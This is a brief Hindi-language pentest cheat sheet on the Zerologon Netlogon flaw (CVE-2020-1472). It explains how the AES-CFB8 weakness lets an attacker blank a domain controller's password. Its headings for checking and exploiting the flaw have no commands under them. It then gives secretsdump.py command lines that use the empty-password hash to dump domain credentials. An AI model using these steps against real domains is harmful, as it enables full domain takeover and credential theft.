
[CVE-2020-1472] नेटलॉगन रिमोट प्रोटोकॉल कॉल (MS-NRPC) विशेषाधिकार वृद्धि (Zerologon)
[CVE-2020-1472] Netlogon रिमोट प्रोटोकॉल कॉल (MS-NRPC) विशेषाधिकार वृद्धि (Zerologon)
यहाँ वर्णित हमला एक क्रिप्टोग्राफिक प्रमाणीकरण प्रोटोकॉल (AES-CFB8 का असुरक्षित उपयोग) में कमजोरियों का फायदा उठाता है, जो डोमेन से जुड़े कंप्यूटर की प्रामाणिकता और पहचान को डोमेन कंट्रोलर (DC) के समक्ष साबित करता है। AES मोड ऑफ ऑपरेशन के गलत उपयोग के कारण, किसी भी कंप्यूटर खाते (स्वयं DC सहित) की पहचान को नकली बनाना और डोमेन में उस खाते के लिए एक खाली पासवर्ड सेट करना संभव है (बस कई Netlogon संदेश भेजकर जिनमें विभिन्न फ़ील्ड शून्य से भरे होते हैं)। इसका उपयोग डोमेन एडमिन क्रेडेंशियल प्राप्त करने के लिए किया जा सकता है और फिर मूल DC पासवर्ड को बहाल किया जा सकता है।
CVE-2020-1472 की जाँच करने के लिए
CVE-2020-1472 का शोषण करने के लिए
फिर, निम्नलिखित में से कोई एक कमांड चलाएँ
उदाहरण प्रारूप 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
उदाहरण प्रारूप 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

मूल ब्लॉग पोस्ट यहाँ उपलब्ध है
पायथन परीक्षण स्क्रिप्ट युक्त मूल रिपॉजिटरी यहाँ उपलब्ध है
पायथन एक्सप्लॉइट स्क्रिप्ट युक्त मूल रिपॉजिटरी यहाँ उपलब्ध है